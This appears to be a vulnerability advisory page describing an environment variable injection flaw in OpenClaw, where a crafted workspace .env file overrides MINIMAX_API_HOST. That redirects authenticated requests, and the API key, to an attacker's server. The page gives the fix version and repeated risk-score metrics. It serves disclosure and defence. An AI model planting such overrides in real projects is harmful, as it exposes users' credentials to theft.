Primary

Context

OpenClaw Environment Variable Injection Vulnerability Allowing MiniMax API Host Override

Vulnerability

A vulnerability exists in OpenClaw versions 2026.4.5 prior to 2026.4.20, allowing for environment variable injection that can override the MINIMAX_API_HOST variable. This flaw enables attackers to redirect authenticated MiniMax API requests to their own servers, potentially exposing the MiniMax API key in the Authorization header.

Impact

Exploitation of this vulnerability could lead to unauthorized exposure of the MiniMax API key, allowing for misuse of the API under the victim's credentials.

Reproduction

The vulnerability can be reproduced by creating a malicious workspace .env file that includes a crafted MINIMAX_API_HOST value. When OpenClaw is run, it will load this environment variable, redirecting MiniMax API requests to the specified, potentially malicious, origin.

Remediation

Users can update to OpenClaw version 2026.4.20 or later, where this vulnerability has been patched.

Added: May 11, 2026, 7:12 PM

Updated: May 11, 2026, 7:12 PM

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

5.4

remediation

0.0

relevance

8.0

threat

4.8

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

Vulnerability Rating

Custom Algorithm

spread

0.0

impact

2.5

exploitability

5.4

remediation

0.0

relevance

8.0

threat

4.8

urgency

2.9

incentive

0.0

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.

OpenClaw Environment Variable Injection Vulnerability Allowing MiniMax API Host Override

Vulnerability

Impact

Reproduction

Remediation

Affected Products

OpenClaw

CVSS Scores

References

Vulnerability Rating

Vulnerability Rating